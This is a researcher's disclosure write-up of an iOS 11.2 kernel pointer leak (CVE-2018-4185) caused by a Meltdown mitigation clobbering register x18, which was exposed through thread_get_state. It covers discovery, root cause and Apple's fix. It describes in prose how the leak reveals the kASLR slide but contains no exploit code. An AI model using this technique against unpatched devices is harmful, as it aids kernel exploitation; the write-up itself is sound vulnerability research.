Who put that kernel pointer in my crash log?
On February 26th, while looking at an iOS application crash log, I noticed a distinctive value in
register x18
:
Register x18
contained a value prefixed by 0xfffffff0
(7 f
s and a 0
), which is the telltale
signature of a kernel pointer. I almost dismissed this as a coincidence, but decided to check some
other crash logs as well. To my surprise, all of them contained the same value in register x18
,
even across different apps. This suggested a true kernel information leak, and a serious one. What
was going on? The answer would lead back, of all places, to the Meltdown vulnerability.
The shape of a pointer
Kernel pointers are distinctive because they have low entropy (the kernel doesn’t take up that much
memory). For example, on macOS, pointers to the kernel image typically begin with 0xffffff80[0-2]
,
pointers to the kernel heap begin with 0xffffff80[1-2]
or 0xffffff9[0-2]
, and pointers to
kernel driver images begin with 0xffffff7f[8-9]
.
On iOS, the layout of the kernel address space is different and varies by device. On the iPhone 7
and later, kernel heap addresses begin with 0xffffffe0
and kernel image addresses begin with
0xfffffff0[0-2]
. On the iPhone 5s through iPhone 6s, kernel image and kernel heap addresses both
begin with 0xfffffff0
.
These ranges may be large, but they are actually quite small when compared to the full space of
64-bit integers. Thus, when I saw that register x18
began with 0xfffffff0
, I knew there was a
good chance it actually came from the kernel and wasn’t just a big negative number.
Identifying the source of the leak
The first step was to figure out how kernel pointers were getting into register x18
. For example,
the leak might only be triggered while a process is crashing, or even worse, it might be a strange
artifact of the crash reporting machinery itself. Such an information leak would still be
interesting, but of limited value. Thus, the very first thing I tried was to create an empty iOS
app, set a breakpoint, and read the value in register x18
:
And just like that, without writing any code at all, I had a working proof of concept! The fact that the leaked kernel pointer could be retrieved by a debugger on a still-running app strongly suggested that it would be possible to write a standalone exploit.
It looked to me like the x18
register was somehow not being cleared on return from the kernel.
The AArch64 ABI specifies that register x18
is reserved for use by the platform, so it’s
plausible that no userspace code had modified x18
since the last syscall return.
The next question was whether the kernel pointer could be retrieved directly by the running app.
A straightforward way to read the value in a particular register is using inline assembly.1
Thus, I added inline assembly to read x18
into a variable and printed the result.
Interestingly, even though the debugger claimed that x18
contained the kernel pointer, the inline
assembly read the value 0
. This meant one of two things: either there was some sort of
architectural magic going on, or the debugger was somehow not getting the true register values.
As it happens, the way a debugger reads registers from the thread being debugged is using the
function thread_get_state
. This function retrieves the state of a thread’s registers as they are
saved when that thread enters the kernel. Thus, the leaked kernel pointer could be reaching
userspace through that function, in which case register x18
might never actually contain a kernel
pointer while in userspace.
To test this, I simply called thread_get_state
on the current thread and printed the value that
the kernel claimed was in register x18
:
And voilà! We have found the source of the leak.
While the exploit in this case is completely trivial, you can find a POC on my GitHub.
Is it useful?
The next thing I wanted to know was what type of leak this was. The most interesting kernel pointer disclosures are those that can be used to defeat the kernel’s address space layout randomization (kASLR), which hides where the kernel resides in memory. Because kASLR simply slides the entire kernel image in memory to a new base address, revealing a single known pointer into the kernel image breaks the whole defense by allowing you to compute the kASLR slide directly.
The simplest way to check whether a kernel infoleak is disclosing a kernel image pointer or something else is to get the leaked value, subtract the kASLR slide, and see if the difference is consistent across reboots. If it is, then the infoleak is disclosing a kernel image pointer and the difference is the static address of the leaked pointer in the kernelcache binary.
So, I disclosed the kernel pointer, panicked the phone, and subtracted the kernel slide recorded in the panic log. Repeating this experiment several times always yielded the same value. Thus, I had found a kernel image pointer leak capable of revealing the kernel slide.
Analyzing the cause of the leak
Once I’d demonstrated that this infoleak could be used to recover the kASLR slide, I reported it to Apple. A few days later, I had some time to try and figure out what was causing the leak.
Since the leak only manifested in register x18
, the natural place to begin was scanning XNU
source code diffs for occurrences of x18
. It quickly became apparent that a large number of
changes involving register x18
took place in the file osfmk/arm64/locore.s
between XNU versions 4570.20.62 (iOS 11.1) and 4570.31.3 (iOS 11.2). These changes seemed to be related to a feature called
__ARM_KERNEL_PROTECT__
. Grepping through the source code for references to that string eventually
revealed the following comment in the file osfmk/arm64/proc_reg.h
:
__ARM_KERNEL_PROTECT__ is a feature intended to guard against potential
architectural or microarchitectural vulnerabilities that could allow cores to
read/access EL1-only mappings while in EL0 mode. This is achieved by
removing as many mappings as possible when the core transitions to EL0 mode
from EL1 mode, and restoring those mappings when the core transitions to EL1
mode from EL0 mode.
That is, when __ARM_KERNEL_PROTECT__
is enabled, transitioning from EL1 (kernel mode) to EL0
(user mode) will remove as many kernel memory mappings as possible. The purpose of this feature is
to limit the possible attack surface against kernel memory mappings when exploiting
microarchitectural vulnerabilities like Spectre or Meltdown. In fact, a
knowledge base article suggests that these changes in iOS 11.2
were specifically designed to protect against Meltdown.
The file osfmk/arm64/locore.s
is responsible for, among other things, implementing the ARM
exception vectors. Lel0_synchronous_vector_64
, the exception vector invoked on a system call
(instruction svc #0
), was significantly changed while adding support for
__ARM_KERNEL_PROTECT__
. In iOS 11.2, the implementation looks like this:
The macro MAP_KERNEL
is responsible for setting up the EL1 memory mappings for the kernel. It is
defined as:
Meanwhile, the macro BRANCH_TO_KVA_VECTOR
is responsible for branching to the real implementation
of the exception vector, which in this case is Lel0_synchronous_vector_64_long
. It is defined as:
Finally, Lel0_synchronous_vector_64_long
contains the original definition of the exception vector
Lel0_synchronous_vector_64
from iOS 11.1:
Thus, Apple has effectively prefixed the original exception vector with some code to restore the
kernel mappings and perform an indirect jump (via x18
) to the original implementation.
The problem is that this prefix code clobbers the value of x18
from userspace before the
userspace registers are saved. While both macros clobber x18
, the information leak that we
observe is due to BRANCH_TO_KVA_VECTOR
. This macro performs an indirect branch to
Lel0_synchronous_vector_64_long
through register x18
. However, this means x18
is set to
Lel0_synchronous_vector_64_long
before Lel0_synchronous_vector_64_long
has a chance to save the
userspace registers. And since the original exception vector implementation does not clear x18
before saving the userspace registers, this makes the clobbered value of x18
available to clients
of thread_get_state
. The result is that when we call thread_get_state
, we end up with a pointer
to Lel0_synchronous_vector_64_long
in x18
.
Timeline
After I discovered and reported the bug on February 26 and provided a more complete analysis on March 2, Apple managed to have the hole fixed in time for their iOS 11.3 release on March 29. The speed at which this bug was fixed was quite a pleasant surprise, especially given that I initially found the bug on a beta release of iOS 11.3.
However, Apple’s initial security announcement for iOS 11.3 did not mention this bug at all. This was a disappointment, but I contacted Apple and they promptly recognized the issue and agreed to assign a CVE and update the advisory.
While waiting for the updated advisory, a friend sent me a link to the following tweet:
How to defeat KASLR on 11.2.6: 1. Create a new xcode project 2. Close it and delete it, choose 'Delete Immediately' from trash 3. Open extra_recipe instead 4. Add a 2 on line 547 so that "i < 28". 5. Remove line 527 6. Who would win, an American multi billion company or one 2boi
— John Åkerblom (@jaakerblom) April 5, 2018
Intrigued, I looked at the GitHub project by John Åkerblom (@jaakerblom and @potmdehex),
extra_recipe_extra_bug, that the author mentioned in a reply to the original tweet. It quickly
became clear from looking at the source that the leak was coming from Mach
exception messages containing register state for a thread. As it turns out, Mach exception messages
use the same state that is returned by thread_get_state
, which means this is another way of
triggering the same bug.
Shortly after that, Viktor Oreshkin (@stek29) published a brief analysis:
So, speaking of info leak (found by @potmdehex I guess): It leaks kernel address of Lel0_synchronous_vector_64_long exception handler.
— Viktor Oreshkin (@stek29) April 6, 2018
Here's how you find unslid address (in kernel cache for example): https://t.co/egJA3FI4As
At that point, I decided to publish my work, even though Apple hadn’t updated the advisory yet.
Conclusion
Given how easy it was to detect, I’m quite surprised that this information leak lasted for nearly 3 months before it was discovered. I wouldn’t be surprised to learn that other parties had found the leak earlier than me but didn’t disclose it.
This bug was an all-around pleasure to find, exploit, and analyze. Stumbling onto a security issue by accident is by far my favorite way to find a bug. Not only that, I quite enjoyed the experience of developing a complete proof-of-concept exploit for a serious security vulnerability without writing a single line of code. And to top it all off, I learned that the bug was actually introduced by the mitigation against Meltdown! (Who’d have thought that the fix for a really big information leak would introduce a small information leak?) Quite good fun, and I hope we never see its like again.
Update (2018.09.24)
Apple assigned this issue CVE-2018-4185 and updated their advisory for iOS 11.3 on July 19, 2018.
Footnotes
-
An even easier way is to mark a local variable as occupying a particular register using an
asm
annotation. However, I wanted to explicitly step through what happened whenx18
was read into another register. ↩